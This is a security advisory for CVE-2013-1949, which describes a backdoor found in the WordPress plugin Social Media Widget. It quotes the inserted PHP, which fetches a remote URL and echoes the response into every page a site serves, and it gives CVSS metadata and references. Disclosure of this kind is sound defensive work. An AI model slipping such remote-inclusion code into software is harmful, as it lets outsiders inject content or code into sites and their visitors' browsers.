Social Media Widget remote file inclusion

2013.04.14
Credit: Kurt Seifried
Risk: High
Local: No
Remote: Yes
CWE: CWE-noinfo


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html http://securityledger.com/hacked-wordpress-plug-in-put-on-double-secret-probation/ http://it.slashdot.org/story/13/04/13/212226/popular-wordpress-plug-in-caught-spamming-is-put-on-probation So the company responsible for Social Media Widget claims that a rogue developer they contracted inserted this code: 470 471 $smw_url = "hxxp://i.aaur.net/i.php"; 472 if(!function_exists("smw_get")){ 473 function smw_get($f) { 474 $response = wp_remote_get( $f ); 475 if( is_wp_error( $response ) ) { 476 function smw_get_body($f) { 477 $ch = @curl_init(); 478 @curl_setopt($ch, CURLOPT_URL, $f); 479 @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 480 $output = @curl_exec($ch); 481 @curl_close($ch); 482 return $output; 483 } 484 echo smw_get_body($f); 485 } else { 486 echo $response["body"]; 487 } 488 } 489 smw_get($smw_url); 490 } Regardless of HOW this code got into the plugin it represents a significant security issue. Any site using this plugin is pulling "hxxp://i.aaur.net/i.php" and including it in the page they generate and send to a user. This opens up a huge can of worms, anyone that can man in the middle your server can now inject PHP into your blog, ot anything sent to the clients/etc. Please use CVE-2013-1949 for this issue.

References:

http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html
http://securityledger.com/hacked-wordpress-plug-in-put-on-double-secret-probation/
http://it.slashdot.org/story/13/04/13/212226/popular-wordpress-plug-in-caught-spamming-is-put-on-probation


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top